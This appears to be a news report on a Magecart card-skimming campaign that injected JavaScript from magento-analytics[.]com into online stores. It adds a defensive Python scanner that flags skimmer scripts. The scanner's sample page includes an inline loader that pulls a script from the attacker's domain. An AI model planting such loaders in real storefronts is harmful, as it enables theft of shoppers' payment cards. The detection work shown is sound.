While monitoring a malicious domain, www.magento-analytics[.]com, for over the last seven months, researchers found that the attackers behind it have been injecting malicious JavaScript hosted on that domain into hundreds of online shopping websites.
Further analysis revealed that the malicious script sends the stolen payment card data to a file hosted on the same magento-analytics[.]com server, which is controlled by the attackers.
“Take one victim as an example, www.kings2.com, when a user loads its homepage, the JS runs as well. If a user selects a product and goes to the ‘Payment Information’ to submit the credit card information, after the CVV data is entered, the credit card information will be uploaded,” researchers explain in a blog post published today.
Having "Magento" in the domain name does not mean the malicious domain is in any way associated with the popular Magento e-commerce CMS platform; the attackers chose the keyword to disguise their activity and make the script look legitimate to anyone who inspects a compromised page.
The malicious domain used in the campaign is registered in Panama; in recent months, however, its IP address has moved from the United States (Arizona) to Moscow, Russia, and then to Hong Kong, China. The hopping is a reminder that IP-based blocking of this infrastructure is brittle and that the domain itself is the more durable indicator.
Researchers found that the domain has been stealing credit card information for at least five months and that a total of 105 websites were infected with the malicious JS at the time of publication, though they believe the real number is higher than what appeared on their radar.
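As an added example (not code from the original report or from the researchers who published it), the following Python script scans a storefront page's HTML for the injection pattern described above: a script tag whose source points at the campaign's exfiltration domain, an inline loader that references it, and, more generally, any external script host that is not on the store operator's allowlist, which catches a skimmer regardless of how convincing its domain name looks. The sample page, the allowlist for www.kings2.com and the script paths are constructed for the demonstration; only the IoC domain comes from the report.

```python
"""Flag scripts on a storefront page that load from a known Magecart
exfiltration domain or from any host outside the operator's allowlist."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Known skimmer infrastructure from this campaign, in the defanged form used
# in the report. refang() turns it back into a matchable hostname.
IOC_DOMAINS = {"magento-analytics[.]com"}

# Hosts the store operator expects to serve scripts. Assumed allowlist for
# the example; a real deployment would generate it from the site's build.
FIRST_PARTY = {"www.kings2.com", "kings2.com"}


def refang(domain: str) -> str:
    """Turn 'example[.]com' back into 'example.com' for matching."""
    return domain.replace("[.]", ".").lower().strip()


def host_matches(host: str, domain: str) -> bool:
    """True if host equals domain or is a subdomain of it (label-aligned,
    so 'magento-analytics.com.evil.net' does not match)."""
    host = host.lower()
    return host == domain or host.endswith("." + domain)


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands over the whole <script> body as one data chunk.
        if self._in_script and data.strip():
            self.inline.append(data)


def scan_page(html: str, page_host: str, allowlist=FIRST_PARTY, iocs=IOC_DOMAINS):
    """Return (kind, detail) findings for every suspicious script on the page."""
    iocs = {refang(d) for d in iocs}
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        # Relative and scheme-relative URLs resolve against the page's host.
        host = urlparse(src).hostname or page_host
        if any(host_matches(host, d) for d in iocs):
            findings.append(("ioc_script", src))
        elif host not in allowlist and host != page_host:
            findings.append(("unlisted_third_party_script", src))
    for body in parser.inline:
        lowered = body.lower()
        if any(d in lowered for d in iocs):
            findings.append(("ioc_in_inline_script", body.strip()[:80]))
    return findings


# Constructed sample page modelled on the report: first-party checkout scripts,
# a skimmer loaded directly from the IoC domain, an unlisted third-party tag,
# and an inline loader that pulls a second script from the IoC domain.
SAMPLE_HTML = """
<html><head>
<script src="/js/checkout.js"></script>
<script src="https://www.kings2.com/static/cart.js"></script>
<script src="https://magento-analytics.com/js/stats.js"></script>
<script src="https://cdn.example-tagmanager.net/tag.js"></script>
<script>
  var s = document.createElement('script');
  s.src = '//www.magento-analytics.com/js/loader.js';
  document.head.appendChild(s);
</script>
</head><body></body></html>
"""

if __name__ == "__main__":
    for kind, detail in scan_page(SAMPLE_HTML, "www.kings2.com"):
        print(kind, detail)
```

Run against crawled homepages and checkout pages, the allowlist rule is what surfaces skimmers hosted on domains nobody has reported yet; the IoC rule gives a high-confidence hit for this particular campaign, and it matches on the hostname rather than the IP so it keeps working as the server moves between hosting providers.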